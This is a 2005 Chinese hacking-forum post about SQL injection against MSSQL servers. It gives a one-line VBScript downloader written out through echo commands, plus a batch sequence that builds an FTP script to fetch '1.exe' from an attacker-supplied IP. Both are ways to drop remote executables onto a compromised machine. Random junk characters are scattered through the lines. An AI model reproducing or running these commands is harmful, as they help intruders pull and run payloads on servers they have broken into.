QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2835|回复: 0
打印 上一主题 下一主题

mssql注射时不可以多次echo的解决办法

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:30 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
<>解决办法:
2 b- {2 U$ ^9 F% s7 B1.iget.vbs一次写入 6 v; u! z9 I) t
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 0 b4 @! v* ~# w+ `: k% y. ^3 _

( |3 F/ K/ T1 {8 T/ D) i- eSet x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 $ i9 ?% n  q' K. D- I6 ~

; _! I  _, ^" P9 H) `这样我们可以一次echo成功,echo版本:
8 M1 _- D! t6 ^$ E! }, k- x' [# f: o4 p, M+ a  H! J  N0 A
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs
7 e$ A& D3 {; c4 N1 ~  T/ a1 O
8 ]* ?0 l3 Y1 w- p% A5 ?- j7 P
  z9 Y' e/ V- p, E0 }2.bat调用ftp脚本的写法(by envymask) " A1 @# ?7 B) X7 Z! G
$ {/ q. Q7 G# O4 d( o
echo ftp&gt;1.vbs " }1 }1 [# J, y4 U  }+ g7 U( e: N
echo open ip&gt;2.vbs ! m$ K# U  ^/ u3 Q
echo u&gt;3.vbs ' r% a! x( M# r9 n3 ]1 k# p
echo s&gt;4.vbs - p" X0 d/ T% A2 L
echo binary&gt;5.vbs
( I' a, c! O/ Z3 z  x; _* }echo get 1.exe&gt;6.vbs
7 r$ v) n5 G+ V& K0 r6 H% Cecho bay&gt;7.vbs
3 G: R. k2 X! S( a) d6 H# Q% x( L8 ^  r/ u& T
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
# b) m- E' F! u2 h9 J</P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-12 07:34 , Processed in 0.396604 second(s), 52 queries .

回顶部